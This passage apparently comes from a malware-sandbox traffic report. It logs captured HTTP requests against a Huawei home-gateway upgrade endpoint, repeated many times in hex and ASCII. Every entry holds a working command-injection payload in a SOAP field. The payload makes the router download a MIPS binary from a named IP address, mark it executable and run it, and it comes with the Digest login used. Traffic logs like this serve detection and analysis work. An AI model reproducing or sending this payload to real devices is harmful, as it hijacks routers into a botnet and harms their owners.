6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
